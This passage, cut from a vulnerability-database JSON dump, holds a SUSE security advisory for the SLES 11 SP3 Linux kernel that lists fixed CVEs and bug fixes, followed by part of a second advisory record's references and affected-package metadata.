href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153</a>>\n * CVE-2014-6410\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410</a>>\n\n The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix\n various bugs and security issues.\n\n Following security bugs were fixed: CVE-2013-1979: The scm_set_cred\n function in include/net/scm.h in the Linux kernel before 3.8.11 uses\n incorrect uid and gid values during credentials passing, which allows\n local users to gain privileges via a crafted application (bnc#816708).\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to obtain\n sensitive information from kernel memory by leveraging /dev/media0 read\n access for a MEDIA_IOC_ENUM_ENTITIES ioctl call (bnc#882804).\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does not\n properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel through\n 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the\n sep CPU feature flag is set, allows local users to cause a denial of\n service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n CVE-2014-4667: The sctp_association_free function in net/sctp/associola.c\n in the Linux kernel before 3.15.2 does not properly manage a certain\n backlog value, which allows remote attackers to cause a denial of service\n (socket outage) via a crafted SCTP packet (bnc#885422).\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux\n kernel through 3.15.6 allows local users to gain privileges by leveraging\n data-structure differences between an l2tp socket and an inet socket\n (bnc#887082).\n\n CVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c in\n the Linux kernel through 3.15.8, when SCTP authentication is enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference and OOPS) by starting to establish an association between two\n endpoints immediately after an exchange of INIT and INIT ACK chunks to\n establish an earlier association between these endpoints in the opposite\n direction (bnc#889173).\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n The following non-security bugs were fixed: - ACPI / PAD: call schedule()\n when need_resched() is true (bnc#866911). - ACPI: Fix bug when ACPI reset\n register is implemented in system memory (bnc#882900). - ACPI: Limit\n access to custom_method (bnc#884333). - Add option to automatically\n enforce module signatures when in Secure Boot mode (bnc#884333). - Add\n secure_modules() call (bnc#884333). - Add wait_on_atomic_t() and\n wake_up_atomic_t() (bnc#880344). - Backported new patches of Lock down\n functions for UEFI secure boot Also updated series.conf and removed old\n patches. - Btrfs: Return EXDEV for cross file system snapshot. - Btrfs:\n abort the transaction when we does not find our extent ref. - Btrfs: avoid\n warning bomb of btrfs_invalidate_inodes. - Btrfs: cancel scrub on\n transaction abortion. - Btrfs: correctly set profile flags on seqlock\n retry. - Btrfs: does not check nodes for extent items. - Btrfs: fix a\n possible deadlock between scrub and transaction committing. - Btrfs: fix\n corruption after write/fsync failure + fsync + log recovery (bnc#894200).\n - Btrfs: fix csum tree corruption, duplicate and outdated checksums\n (bnc#891619). - Btrfs: fix double free in find_lock_delalloc_range. -\n Btrfs: fix possible memory leak in btrfs_create_tree(). - Btrfs: fix use\n of uninit "ret" in end_extent_writepage(). - Btrfs: free delayed node\n outside of root->inode_lock (bnc#866864). - Btrfs: make DEV_INFO ioctl\n available to anyone. - Btrfs: make FS_INFO ioctl available to anyone. -\n Btrfs: make device scan less noisy. - Btrfs: make sure there are not any\n read requests before stopping workers. - Btrfs: more efficient io tree\n navigation on wait_extent_bit. - Btrfs: output warning instead of error\n when loading free space cache failed. - Btrfs: retrieve more info from\n FS_INFO ioctl. - Btrfs: return EPERM when deleting a default subvolume\n (bnc#869934). - Btrfs: unset DCACHE_DISCONNECTED when mounting default\n subvol (bnc#866615).\n - Btrfs: use right type to get real comparison. - Btrfs: wake up\n @scrub_pause_wait as much as we can. - Btrfs: wake up transaction thread\n upon remount. - CacheFiles: Add missing retrieval completions\n (bnc#880344).\n - CacheFiles: Does not try to dump the index key if the cookie has been\n cleared (bnc#880344). - CacheFiles: Downgrade the requirements passed to\n the allocator (bnc#880344). - CacheFiles: Fix the marking of cached\n pages (bnc#880344). - CacheFiles: Implement invalidation (bnc#880344). -\n CacheFiles: Make some debugging statements conditional (bnc#880344). -\n Drivers: hv: util: Fix a bug in the KVP code (bnc#886840). - Drivers:\n hv: vmbus: Fix a bug in the channel callback dispatch code (bnc#886840).\n - FS-Cache: Add transition to handle invalidate immediately after lookup\n (bnc#880344). - FS-Cache: Check that there are no read ops when cookie\n relinquished (bnc#880344). - FS-Cache: Clear remaining page count on\n retrieval cancellation (bnc#880344). - FS-Cache: Convert the object\n event ID #defines into an enum (bnc#880344). - FS-Cache: Does not sleep\n in page release if __GFP_FS is not set (bnc#880344). - FS-Cache: Does\n not use spin_is_locked() in assertions (bnc#880344). - FS-Cache:\n Exclusive op submission can BUG if there is been an I/O error\n (bnc#880344). - FS-Cache: Fix __wait_on_atomic_t() to call the action\n func if the counter != 0 (bnc#880344). - FS-Cache: Fix object state\n machine to have separate work and wait states (bnc#880344). - FS-Cache:\n Fix operation state management and accounting (bnc#880344). - FS-Cache:\n Fix signal handling during waits (bnc#880344). - FS-Cache: Initialise\n the object event mask with the calculated mask (bnc#880344). - FS-Cache:\n Limit the number of I/O error reports for a cache (bnc#880344). -\n FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344). - FS-Cache: Mark cancellation of in-progress operation\n (bnc#880344). - FS-Cache: One of the write operation paths doeses not\n set the object state (bnc#880344). - FS-Cache: Provide proper\n invalidation (bnc#880344). - FS-Cache: Simplify cookie retention for\n fscache_objects, fixing oops (bnc#880344). - FS-Cache: The retrieval\n remaining-pages counter needs to be atomic_t (bnc#880344). - FS-Cache:\n Uninline fscache_object_init() (bnc#880344). - FS-Cache: Wrap checks on\n object state (bnc#880344). - HID: usbhid: add always-poll quirk\n (bnc#888607). - HID: usbhid: enable always-poll quirk for Elan\n Touchscreen (bnc#888607). - IB/iser: Add TIMEWAIT_EXIT event handling\n (bnc#890297). - Ignore "flags" change to event_constraint (bnc#876114). -\n Ignore data_src/weight changes to perf_sample_data (bnc#876114). - NFS:\n Allow more\n operations in an NFSv4.1 request (bnc#890513). - NFS: Clean up helper\n function nfs4_select_rw_stateid() (bnc#888968). - NFS: Does not copy read\n delegation stateids in setattr (bnc#888968). - NFS: Does not use a\n delegation to open a file when returning that delegation (bnc#888968,\n bnc#892200, bnc#893596, bnc#893496) - NFS: Fixes for NFS RCU-walk support\n in line with code going upstream - NFS: Use FS-Cache invalidation\n (bnc#880344). - NFS: allow lockless access to access_cache (bnc#866130).\n - NFS: avoid mountpoint being displayed as " (deleted)" in /proc/mounts\n (bnc#888591). - NFS: nfs4_do_open should add negative results to the\n dcache (bnc#866130). - NFS: nfs_migrate_page() does not wait for FS-Cache\n to finish with a page (bnc#880344). - NFS: nfs_open_revalidate: only\n evaluate parent if it will be used (bnc#866130). - NFS: prepare for\n RCU-walk support but pushing tests later in code (bnc#866130). - NFS:\n support RCU_WALK in nfs_permission() (bnc#866130). - NFS: teach\n nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130). - NFS: teach\n nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130). - NFSD: Does\n not hand out delegations for 30 seconds after recalling them\n (bnc#880370). - NFSv4 set open access\n operation call flag in nfs4_init_opendata_res (bnc#888968, bnc#892200,\n bnc#893596, bnc#893496). - NFSv4: Add a helper for encoding opaque data\n (bnc#888968). - NFSv4: Add a helper for encoding stateids (bnc#888968). -\n NFSv4: Add helpers for basic copying of stateids (bnc#888968). - NFSv4:\n Clean up nfs4_select_rw_stateid() (bnc#888968). - NFSv4: Fix the return\n value of nfs4_select_rw_stateid (bnc#888968). - NFSv4: Rename\n nfs4_copy_stateid() (bnc#888968). - NFSv4: Resend the READ/WRITE RPC call\n if a stateid change causes an error (bnc#888968). - NFSv4: Simplify the\n struct nfs4_stateid (bnc#888968). - NFSv4: The stateid must remain the\n same for replayed RPC calls (bnc#888968). - NFSv4:\n nfs4_stateid_is_current should return "true" for an invalid stateid\n (bnc#888968). - One more fix for kABI breakage. - PCI: Lock down BAR\n access when module security is enabled (bnc#884333). - PCI: enable MPS\n "performance" setting to properly handle bridge MPS (bnc#883376). - PM /\n Hibernate: Add memory_rtree_find_bit function (bnc#860441). - PM /\n Hibernate: Create a Radix-Tree to store memory bitmap (bnc#860441). - PM\n / Hibernate: Implement position keeping in radix tree (bnc#860441). - PM\n / Hibernate: Iterate over set bits instead of PFNs in swsusp_free()\n (bnc#860441). - PM / Hibernate: Remove the old memory-bitmap\n implementation (bnc#860441). - PM / Hibernate: Touch Soft Lockup Watchdog\n in rtree_next_node (bnc#860441). - Restrict /dev/mem and /dev/kmem when\n module loading is restricted (bnc#884333). - Reuse existing "state" field\n to indicate PERF_X86_EVENT_PEBS_LDLAT (bnc#876114). - USB: handle LPM\n errors during device suspend correctly (bnc#849123). - Update kabi files\n to reflect fscache change (bnc#880344) - VFS: Make more complete truncate\n operation available to CacheFiles (bnc#880344). - [FEAT NET1222]\n ib_uverbs: Allow explicit mmio trigger (FATE#83366, ltc#83367). - acpi:\n Ignore acpi_rsdp kernel parameter when module loading is restricted\n (bnc#884333). - af_iucv: correct cleanup if listen backlog is full\n (bnc#885262, LTC#111728). - asus-wmi: Restrict debugfs interface when\n module loading is restricted (bnc#884333). - autofs4: allow RCU-walk to\n walk through autofs4 (bnc#866130). - autofs4: avoid taking fs_lock during\n rcu-walk (bnc#866130). - autofs4: does not take spinlock when not needed\n in autofs4_lookup_expiring (bnc#866130). - autofs4: factor\n should_expire() out\n of autofs4_expire_indirect (bnc#866130). - autofs4: make\n "autofs4_can_expire" idempotent (bnc#866130). - autofs4: remove a\n redundant assignment (bnc#866130). - autofs: fix lockref lookup\n (bnc#888591). - be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759). - block: add cond_resched() to potentially long running\n ioctl discard loop (bnc#884725). - block: fix race between request\n completion and timeout handling (bnc#881051). - cdc-ether: clean packet\n filter upon probe (bnc#876017). - cpuset: Fix memory allocator deadlock\n (bnc#876590). - crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not\n all archs have them, but some are FIPS certified, with some kernel\n support. - crypto: fips\n - only panic on bad/missing crypto mod signatures (bnc#887503). - crypto:\n testmgr - allow aesni-intel and ghash_clmulni-intel in fips mode\n (bnc#889451). - dasd: validate request size before building CCW/TCW\n (bnc#891087, LTC#114068). - dm mpath: fix race condition between\n multipath_dtr and pg_init_done (bnc#826486). - dm-mpath: fix panic on\n deleting sg device (bnc#870161). - drm/ast: Add missing entry to\n dclk_table[]. - drm/ast: Add reduced non reduced mode parsing for wide\n screen mode (bnc#892723). - drm/i915: Only apply DPMS to the encoder if\n enabled (bnc#893064). - drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at\n driver init (bnc#869055). - drm/i915: create functions for the\n "unclaimed register" checks (bnc#869055). - drm/i915: use FPGA_DBG for\n the "unclaimed register" checks (bnc#869055). - drm/mgag200: Initialize\n data needed to map fbdev memory (bnc #806990). - e1000e: enable support\n for new device IDs (bnc#885509). - fs/fscache: remove spin_lock() from\n the condition in while() (bnc#880344). - hibernate: Disable in a signed\n modules environment (bnc#884333). - hugetlb: does not use ERR_PTR with\n VM_FAULT* values - ibmvscsi: Abort init sequence during error recovery\n (bnc#885382). - ibmvscsi: Add memory barriers for send / receive\n (bnc#885382). - inet: add a redirect generation id in inetpeer\n (bnc#860593). - inetpeer: initialize\n ->redirect_genid in inet_getpeer() (bnc#860593). - ipv6: tcp: fix\n tcp_v6_conn_request() (bnc#887645). - kabi: hide bnc#860593 changes of\n struct inetpeer_addr_base (bnc#860593). - kernel: 3215 tty hang\n (bnc#891087, LTC#114562). - kernel: fix data corruption when reading\n /proc/sysinfo (bnc#891087, LTC#114480). - kernel: fix kernel oops with\n load\n of fpc register (bnc#889061, LTC#113596). - kernel: sclp console tty\n reference counting (bnc#891087, LTC#115466). - kexec: Disable at runtime\n if the kernel enforces module loading restrictions (bnc#884333). -\n md/raid6: avoid data corruption during recovery of double-degraded RAID6.\n - memcg, vmscan: Fix forced scan of anonymous pages (memory reclaim fix).\n - mm, hugetlb: add VM_NORESERVE check in vma_has_reserves() - mm,\n hugetlb: change variable name reservations to resv - mm, hugetlb:\n decrement reserve count if VM_NORESERVE alloc page cache - mm, hugetlb:\n defer freeing pages when gathering surplus pages - mm, hugetlb: do not\n use a page in page cache for cow optimization - mm, hugetlb: fix and\n clean-up node iteration code to alloc or free - mm, hugetlb: fix race in\n region tracking - mm, hugetlb: fix subpool accounting handling - mm,\n hugetlb: improve page-fault scalability - mm, hugetlb: improve, cleanup\n resv_map parameters - mm, hugetlb: move up the code which check\n availability of free huge page - mm, hugetlb: protect reserved pages when\n soft offlining a hugepage - mm, hugetlb: remove\n decrement_hugepage_resv_vma() - mm, hugetlb: remove redundant list_empty\n check in gather_surplus_pages() - mm, hugetlb: remove resv_map_put - mm,\n hugetlb: remove useless check about mapping type - mm, hugetlb: return a\n reserved page to a reserved pool if failed - mm, hugetlb: trivial\n commenting fix - mm, hugetlb: unify region structure handling - mm,\n hugetlb: unify region structure handling kabi - mm, hugetlb: use long\n vars instead of int in region_count() (Hugetlb Fault Scalability). - mm,\n hugetlb: use vma_resv_map() map types - mm, oom: fix badness score\n underflow (bnc#884582, bnc#884767). - mm, oom: normalize oom scores to\n oom_score_adj scale only for userspace (bnc#884582, bnc#884767). - mm,\n thp: do not allow thp faults to avoid cpuset restrictions (bnc#888849). -\n net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680). - net/mlx4_core: Load the IB driver when the device\n supports IBoE (bnc#887680). - net/mlx4_en: Fix a race between napi poll\n function and RX ring cleanup (bnc#863586). - net/mlx4_en: Fix selftest\n failing on non 10G link speed (bnc#888058). - net: fix checksumming\n features handling in\n output path (bnc#891259). - perf/core: Add weighted samples (bnc#876114).\n - perf/x86: Add flags to event constraints (bnc#876114). - perf/x86: Add\n memory profiling via PEBS Load Latency (bnc#876114). - perf: Add generic\n memory sampling interface (bnc#876114). - qla2xxx: Avoid escalating the\n SCSI error handler if the command is not found in firmware (bnc#859840).\n - qla2xxx: Clear loop_id for ports that are marked lost during fabric\n scanning (bnc#859840). - qla2xxx: Does not check for firmware hung during\n the reset context for ISP82XX (bnc#859840). - qla2xxx: Issue abort\n command for outstanding commands during cleanup when only firmware is\n alive (bnc#859840). - qla2xxx: Reduce the time we wait for a command to\n complete during SCSI error handling (bnc#859840). - qla2xxx: Set host\n can_queue value based on available resources (bnc#859840). - restore\n smp_mb() in unlock_new_inode() (bnc#890526). - s390/pci: introduce lazy\n IOTLB flushing for DMA unmap (bnc#889061, LTC#113725). - sched: fix the\n theoretical signal_wake_up() vs schedule() race (bnc#876055). -\n sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035). - scsi_dh: use missing accessor "scsi_device_from_queue"\n (bnc#889614). - scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail\n (bnc#887608). - scsiback: correct grant page unmapping. - scsiback: fix\n retry handling in __report_luns(). - scsiback: free resources after\n error. - sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130). - supported.conf: remove external from drivers/net/veth\n (bnc#889727) - supported.conf: support net/sched/act_police.ko\n (bnc#890426) - tcp: adapt selected parts of RFC 5682 and PRR logic\n (bnc#879921). - tg3: Change nvram command timeout value to 50ms\n (bnc#855657). - tg3: Override clock, link aware and link idle mode during\n NVRAM dump (bnc#855657). - tg3: Set the MAC clock to the fastest speed\n during boot code load (bnc#855657). - usb: Does not enable LPM if the\n exit latency is zero (bnc#832309). - usbcore: Does not log on consecutive\n debounce failures of the same port (bnc#888105). - usbhid: fix PIXART\n optical mouse (bnc#888607). - uswsusp: Disable when module loading is\n restricted (bnc#884333). - vscsi: support larger transfer sizes\n (bnc#774818). - x86 thermal: Delete power-limit-notification console\n messages (bnc#882317). - x86 thermal: Disable power limit notification\n interrupt by default (bnc#882317). - x86 thermal: Re-enable power limit\n notification interrupt by default (bnc#882317). - x86/UV: Add call to\n KGDB/KDB from NMI handler (bnc#888847). - x86/UV: Add kdump to UV NMI\n handler (bnc#888847). - x86/UV: Add summary of cpu activity to UV NMI\n handler (bnc#888847). - x86/UV: Move NMI support (bnc#888847). - x86/UV:\n Update UV support for external NMI signals (bnc#888847). - x86/uv/nmi:\n Fix Sparse warnings (bnc#888847). - x86: Lock down IO port access when\n module security is enabled (bnc#884333). - x86: Restrict MSR access when\n module loading is restricted (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n", "reporter": "Suse", "published": "2014-10-22T21:04:47", "title": "Security update for Linux kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-5077", "CVE-2014-1739", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-4027", "CVE-2013-1979", "CVE-2014-3153", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-4667", "CVE-2014-2706"], "modified": "2014-10-22T21:04:47", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00006.html", "id": "SUSE-SU-2014:1316-1", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:50", "references": ["http://download.suse.com/patch/finder/?keywords=33223d7de0d6fcaf9f12c0175a720ae1", "https://bugzilla.novell.com/880484", "https://bugzilla.novell.com/806431", "https://bugzilla.novell.com/871797", "https://bugzilla.novell.com/884530", "https://bugzilla.novell.com/885725", "https://bugzilla.novell.com/887082", "https://bugzilla.novell.com/892490", "http://download.suse.com/patch/finder/?keywords=bb89429b2b6bbf8e51a9b446b5a9f825", "https://bugzilla.novell.com/883795", "https://bugzilla.novell.com/885422", "https://bugzilla.novell.com/877257", "https://bugzilla.novell.com/882809", "https://bugzilla.novell.com/883724", "http://download.suse.com/patch/finder/?keywords=cc2185e1b7bb5f72a49d967c7dcf07ee", "http://download.suse.com/patch/finder/?keywords=ad20790f90bee656575f760123b63fe2", "https://bugzilla.novell.com/883526", "https://bugzilla.novell.com/881051", "https://bugzilla.novell.com/889173", "https://bugzilla.novell.com/794824", "http://download.suse.com/patch/finder/?keywords=753dcd87154cfcee28dc062d0421697d", "http://download.suse.com/patch/finder/?keywords=f3d32743e8c31acee5f4fb836923cc28", "https://bugzilla.novell.com/831058", "https://bugzilla.novell.com/854722", "https://bugzilla.novell.com/856756", "https://bugzilla.novell.com/879921"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-trace-base-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-xen-extra-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-xen-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "4.0.3_21548_16_2.6.32.59_0.15-0.5.26", "arch": "i586", "packageFilename": "xen-kmp-trace-4.0.3_21548_16_2.6.32.59_0.15-0.5.26.i586.rpm", "packageName": "xen-kmp-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "4.0.3_21548_16_2.6.32.59_0.15-0.5.26", "arch": "i586", "packageFilename": "xen-kmp-default-4.0.3_21548_16_2.6.32.59_0.15-0.5.26.i586.rpm", "packageName": "xen-kmp-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-syms-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-trace-base-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-trace-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-default-devel-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-trace-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-default-base-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-xen-devel-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-default-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-ec2-devel-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-default-man-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-default-man", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-ec2-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-ec2-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-trace-devel-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-trace-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-ec2-base-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-ec2-base-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-source-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-default-devel-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "4.0.3_21548_16_2.6.32.59_0.15-0.5.26", "arch": "i586", "packageFilename": "xen-kmp-pae-4.0.3_21548_16_2.6.32.59_0.15-0.5.26.i586.rpm", "packageName": "xen-kmp-pae", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-default-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.32.59-0.15.2.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "i586", "packageFilename": "kernel-default-2.6.32.59-0.15.2.i586.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "2.6.32.59-0.15.2", "arch": "s390x", "packageFilename": "kernel-source-2.6.32.59-0.15.2.s390x.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", 